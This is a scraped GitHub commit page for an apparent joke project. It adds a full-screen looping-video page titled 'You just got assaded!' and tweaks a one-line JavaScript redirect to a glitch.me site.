Skip to content

Commit

Permalink
h
Browse files Browse the repository at this point in the history
  • Loading branch information
indexerrowaty committed Aug 17, 2020
1 parent db696c6 commit 1a40857
Show file tree
Hide file tree
Showing 3 changed files with 15 additions and 1 deletion.
Binary file added assad.mov
Binary file not shown.
14 changes: 14 additions & 0 deletions block.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>You just got assaded!</title>
<style>body {margin: 0px !important; background-color: black;} video {height: 100vh; width: 100vw;}</style>
<link rel="icon" href="icon48x48.png">
</head>
<body>
<video loop controls><source src="/assad.mov"></video>
</body>
</html>
2 changes: 1 addition & 1 deletion script.js
Original file line number Diff line number Diff line change
@@ -1 +1 @@
location.href="https://ur-assaded.glitch.me/";
location.href="https://ur-assaded.glitch.me";

0 comments on commit 1a40857

Please sign in to comment.